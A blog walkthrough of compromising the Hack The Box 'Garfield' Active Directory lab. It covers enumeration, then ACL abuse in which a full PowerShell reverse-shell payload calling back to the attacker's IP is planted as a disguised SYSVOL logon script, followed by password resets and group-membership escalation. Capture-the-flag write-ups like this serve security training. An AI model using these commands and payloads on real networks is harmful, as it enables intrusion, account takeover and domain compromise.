Garfield HTB Write Up

Welcome to another Hack the Box walkthrough. In this blog post, I have demonstrated how I owned the Garfield machine on Hack the Box. Hack The Box is a cybersecurity platform that helps you bridge knowledge gaps and prepares you for cyber security jobs.

You can also test and grow your penetration testing skills, from gathering information to reporting. If you are new to this blog, please do not forget to like, comment and subscribe to my YouTube channel and follow me on LinkedIn for more updates.

About the Machine

Garfield is a Hard Difficulty Level Machine on Hack the Box

solved Garfield hack the box hard windows machine htb

Protected Page

The first step in owning the Garfield machine like I have always done in my previous writeups is to connect my Kali Linux terminal with Hack the Box server. To establish this connection, I ran the following command in the terminal:

sudo openvpn garfield.ovpn

Once the connection between my Kali Linux terminal and Hack the Box server has been established, I started the Kobold HTB machine and I was assigned an IP address (10.129.25.190).

Nmap Enumeration

I began by running a full service and version scan against the new target to identify exposed services:

nmap -sCV -A 10.129.25.190

The scan revealed that the host is a Windows system, specifically a Domain Controller (DC01.garfield.htb) in the garfield.htb domain. Key Active Directory services such as Kerberos (88), LDAP (389/3268), and SMB (445) confirmed this immediately.

Additional ports like 135 (RPC), 139 (NetBIOS), and 593 (RPC over HTTP) suggested multiple avenues for enumeration. SMB signing was enforced, which limits NTLM relay attacks and indicates a more secure configuration.

RDP (3389) was exposed, providing a potential remote access vector if valid credentials are obtained. WinRM (5985) was also available, which is often useful for command execution after authentication. The presence of DNS (53) further confirmed this is a core infrastructure server within the domain.

I also noticed a significant clock skew, which could interfere with Kerberos-based attacks if not adjusted. Overall, this scan confirmed that the target is a fully functional Domain Controller, making LDAP, Kerberos, SMB, and WinRM the primary focus for further enumeration.

Host Configuration

Before proceeding further, I configured local name resolution to properly interact with the domain services:

echo "10.129.25.190  garfield.htb DC01.garfield.htb DC01" | sudo tee -a /etc/hosts

I added the target IP and associated domain names to my /etc/hosts file. This ensured that tools relying on DNS (especially Kerberos and LDAP) would resolve correctly. Proper hostname resolution is critical in Active Directory environments. With this in place, I was ready to continue enumeration without resolution issues.

Time Synchronization

I noticed a significant clock skew during enumeration, which would break Kerberos-based authentication. Since Kerberos is highly time-sensitive, I needed to sync my machine with the target Domain Controller.

sudo timedatectl set-ntp false
sudo ntpdate 10.129.25.190

I disabled automatic time sync and manually aligned my system time with the target. The output confirmed a large time adjustment (~8 hours), explaining previous authentication issues. Fixing this ensured Kerberos tickets would now be accepted, allowing me to proceed with AD attacks reliably.

SMB Enumeration

I authenticated to the target using valid domain credentials to enumerate available SMB shares. This helps identify accessible resources and potential paths for privilege escalation or lateral movement.

smbclient -L //10.129.25.190 -U "garfield.htb/j.arbuckle%Th1sD4mnC4t\!@1978"

I successfully listed the shares and confirmed access to standard administrative shares like ADMIN$, C$, NETLOGON, and SYSVOL. The presence of NETLOGON and SYSVOL is typical in Domain Controllers and can contain useful scripts or policies. The SMB1 error can be ignored, as modern systems disable SMB1 by default. This confirmed my credentials are valid and can be leveraged for further enumeration.

RPC Enumeration

I leveraged my valid domain credentials to enumerate domain users via RPC, which is useful for identifying potential targets for password attacks or privilege escalation.

rpcclient -U "garfield.htb/j.arbuckle%Th1sD4mnC4t\!@1978" 10.129.25.190 -c "enumdomusers"

I successfully enumerated several domain accounts, including standard users and privileged accounts like Administrator and krbtgt. I also identified additional users such as l.wilson and l.wilson_adm, which may indicate a privileged account worth targeting. This confirmed my credentials have sufficient access for enumeration, giving me a solid user list for further attacks like Kerberoasting or password spraying.

RPC Enumeration

I continued leveraging my authenticated access to enumerate domain groups via RPC, aiming to identify privileged groups and potential escalation paths.

rpcclient -U "garfield.htb/j.arbuckle%Th1sD4mnC4t\!@1978" 10.129.25.190 -c "enumdomgroups"

garfield htb machine complete solution pdf

I successfully listed all domain groups, including highly privileged ones like Domain Admins, Enterprise Admins, and Schema Admins. I also noticed custom groups such as IT Support and Tier 1, which could indicate delegated privileges within the environment. These groups are key targets for further enumeration, especially when mapping users to groups to identify misconfigurations or privilege escalation opportunities.

LDAP Enumeration

I used my valid domain credentials to query LDAP and enumerate computer objects within the domain. This helps identify domain-joined machines that could be targeted later.

ldapsearch -x -H ldap://10.129.25.190 -D "j.arbuckle@garfield.htb" -w 'Th1sD4mnC4t!@1978' -b "DC=garfield,DC=htb" "(objectClass=computer)" sAMAccountName

garfield htb season 10 solution Windows machine

I successfully enumerated two domain computers: DC01$ and RODC01$, confirming the presence of both a primary Domain Controller and a Read-Only Domain Controller. This gives insight into the domain structure and potential targets for lateral movement. The successful bind also confirmed my credentials are valid for LDAP queries, enabling deeper AD enumeration moving forward.

BloodHound Setup

Before continuing enumeration, I ensured that BloodHound and its dependencies were properly installed on my attack machine. This tool will help visualize Active Directory relationships and identify attack paths.

python3 -m pip install bloodhound --break-system-packages

Garfield HTB Hard Windows Machine Season 10

I ran the installation and confirmed BloodHound was already present, with only an additional dependency (pycryptodome) being installed. This ensured my environment was fully ready for AD data collection. With BloodHound set up, I can now proceed to gather domain data and map privilege escalation paths more effectively.

BloodHound Enumeration

With BloodHound installed, I proceeded to collect Active Directory data using my valid domain credentials. This step is crucial for mapping relationships and identifying potential privilege escalation paths.

bloodhound-python -u j.arbuckle -p 'Th1sD4mnC4t!@1978' -d garfield.htb -dc DC01.garfield.htb -ns 10.129.25.190 -c All

I attempted Kerberos authentication but it failed due to connectivity issues, so the tool fell back to NTLM and continued successfully. I was able to enumerate key AD objects including users, groups, computers, and GPOs across the domain. The output confirmed a small environment with only two machines and no domain trusts. This data will now be ingested into BloodHound to visually analyze attack paths and identify privilege escalation opportunities.

LDAP Enumeration

I performed a deeper LDAP query to inspect sensitive attributes related to password replication on the Domain Controllers, specifically targeting RODC behavior.

ldapsearch -x -H ldap://10.129.25.190 -D "j.arbuckle@garfield.htb" -w 'Th1sD4mnC4t!@1978' -b "DC=garfield,DC=htb" "(objectClass=computer)" cn msDS-RevealedUsers msDS-NeverRevealGroup msDS-RevealOnDemandGroup

I identified that RODC01 has cached credentials (msDS-RevealedUsers) for accounts like Administrator and krbtgt_8245, which is highly interesting from an attack perspective. The msDS-NeverRevealGroup showed protected groups whose credentials are never cached, while msDS-RevealOnDemandGroup defines allowed replication. This indicates that sensitive credentials may be stored on the RODC, opening a potential path for credential extraction and privilege escalation.

ACL Enumeration

I used BloodyAD to identify objects in the domain where my user had write permissions, which is critical for finding privilege escalation paths through ACL abuse.

bloodyAD -u j.arbuckle -p 'Th1sD4mnC4t!@1978' -d garfield.htb --host 10.129.25.190 get writable --otype USER --detail

I discovered that I had write access to attributes like scriptPath on multiple users, including krbtgt_8245, l.wilson, and l.wilson_adm. This is particularly interesting as modifying scriptPath can lead to code execution during logon. I also noticed extensive writable attributes on my own user, including msDS-AllowedToActOnBehalfOfOtherIdentity, which could be abused for delegation attacks. These findings indicate multiple potential privilege escalation paths through AD object manipulation.

Exploitation - ScriptPath Abuse

I set up a listener and crafted a PowerShell reverse shell payload, then encoded it to bypass execution restrictions on the target.

nc -lvnp 4444

PAYLOAD='$client = New-Object System.Net.Sockets.TCPClient("10.10.15.144",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
B64=$(echo -n $PAYLOAD | iconv -t UTF-16LE | base64 -w 0)

htb machine Garfield complete write up solution

I wrapped the payload into a batch script and uploaded it to the SYSVOL scripts share so it could be executed during user logon.

cat > /tmp/printerDetect.bat << EOF
@echo off
powershell -enc $B64
EOF

smbclient //10.129.25.190/SYSVOL -U "garfield.htb/j.arbuckle%Th1sD4mnC4t\!@1978" -c 'cd garfield.htb\scripts; put /tmp/printerDetect.bat printerDetect.bat'

I then abused my write privileges on l.wilson by modifying the scriptPath, forcing execution of my malicious script upon logon.

bloodyAD -u j.arbuckle -p 'Th1sD4mnC4t!@1978' -d garfield.htb --host 10.129.25.190 set object "CN=Liz Wilson,CN=Users,DC=garfield,DC=htb" scriptPath -v printerDetect.bat

After a short delay, I received a reverse shell as garfield\l.wilson, confirming successful code execution on the target.

nc -lvnp 4444
whoami

With this access, I escalated privileges by resetting the password of the privileged account l.wilson_adm.

$newpass = ConvertTo-SecureString 'Boltech123' -AsPlainText -Force
Set-ADAccountPassword -Identity l.wilson_adm -NewPassword $newpass -Reset

This completed the privilege escalation path by leveraging ACL misconfigurations and logon script abuse to gain control over a higher-privileged account.

Initial Foothold (WinRM Access)

With the newly reset credentials, I authenticated to the target via WinRM to gain an interactive shell as the privileged user.

evil-winrm -i 10.129.25.190 -u l.wilson_adm -p 'Boltech123'

Garfield hack the box htb user flag retrieval

I successfully established a remote PowerShell session and navigated to the user’s Desktop directory. From there, I enumerated the contents and located the user.txt flag. Reading the file confirmed full access as l.wilson_adm, marking a successful foothold on the system. This validated the privilege escalation path and gave me a stable shell for further post-exploitation.

Privilege Escalation (Group Abuse)

After gaining access as a privileged user, I leveraged my permissions to further escalate privileges within the domain by modifying group memberships.

bloodyAD -u l.wilson_adm -p 'Boltech123' -d garfield.htb --host 10.129.25.190 add groupMember "RODC Administrators" l.wilson_adm

I successfully added l.wilson_adm to the RODC Administrators group, granting elevated control over the Read-Only Domain Controller. This group membership is powerful, as it can be abused to extract cached credentials or perform further domain-level attacks. This step positioned me closer to full domain compromise by expanding my privileges within the AD environment.